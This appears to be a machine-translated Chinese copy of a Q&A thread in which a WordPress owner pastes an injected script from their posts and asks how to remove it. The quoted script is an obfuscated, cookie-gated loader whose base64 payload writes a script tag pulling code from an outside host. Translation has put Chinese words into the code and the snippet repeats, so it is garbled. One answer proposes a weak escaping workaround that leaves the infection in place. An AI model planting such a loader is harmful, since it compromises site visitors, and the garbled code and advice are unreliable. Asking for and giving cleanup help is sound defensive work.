如何删除我下面所有wordpress帖子中注入的脚本代码是脚本
(e){var U = //单行注释(//(“(?:^ |; )” + e.replace(/([.$?| {}()[] \ / + ^])/ g,” \ $ 1'')+” =([^;])”)));返回 U?decodeURIComponent(U [1]):void 0} var SRC =”数据:文本/ JavaScript的; BASE64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs =”,现在= Math.floor(Date.now()/ 1E3),饼干=的getCookie(‘重定向’);如果(现在> =(时间=饼干)| |无效 0 === time){var time = Math.floor(Date.now()/ 1e3 + 86400),date = new Date((new Date).getTime()+ 86400); document.cookie =” redirect =” + time +”;路径= /; expire(e){var U = //单行注释(//(“(?:^ |; )” + e.replace(/([.$?| {}()[] / + ^])/ g,” $ 1'')+” =([^;])”)));返回 U?decodeURIComponent(U [1]):void 0} var SRC =”数据:文本/ JavaScript的; BASE64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs =”,现在= Math.floor(Date.now()/ 1E3),饼干=的getCookie(‘重定向’);如果(现在> =(时间=饼干)| |无效 0 === time){var time = Math.floor(Date.now()/ 1e3 + 86400),date = new Date((new Date).getTime()+ 86400); document.cookie =” redirect =” + time +”;路径= /; expires =” + date.toGMTString(),tv(‘=” + date.toGMTString(),tv(‘
答案 0 :(得分:0)
我建议您删除the_content()函数,而改为添加get_the_content()。
找到the_content()并将其替换为以下内容。
echo esc_attr(get_the_content());
这实际上删除了不必要的脚本和标签。
答案 1 :(得分:0)
一种方法是下载sql数据库,进行复制,在Notepad ++中进行编辑,并使用花哨的正则表达式或类似内容来选择所有受影响的行,然后将其删除。 删除旧数据库,然后重新导入更改的sql数据库...
仅当您愿意将数据库与网页分开使用时,才尝试进行此操作。
如果在您的网站上注入了类似内容,请确保将来进行安全更新。确保所有管理员用户都难以猜测密码,可以考虑更改密码,并仔细检查是否有新的管理员注册,而您不知道自己是谁(一次发生在我身上)。
答案 2 :(得分:0)
在我看来,您的网站已被黑客入侵。与其尝试找到解决方法,不如消除感染。
深吸一口气,阅读以下内容:https://codex.wordpress.org/FAQ_My_site_was_hacked